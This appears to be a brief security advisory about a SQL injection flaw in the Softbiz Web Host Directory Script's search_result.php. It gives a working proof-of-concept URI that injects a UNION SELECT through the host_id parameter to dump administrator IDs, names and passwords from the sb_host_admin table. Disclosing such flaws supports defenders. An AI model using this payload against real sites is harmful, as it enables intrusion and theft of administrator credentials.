|
Softbiz Web Host Directory Script 'search_result.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following proof-of-concept URI is available: http://www.example.com/hostdirectory/search_result.php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 from sb_host_admin-- |
|
|
Privacy Statement |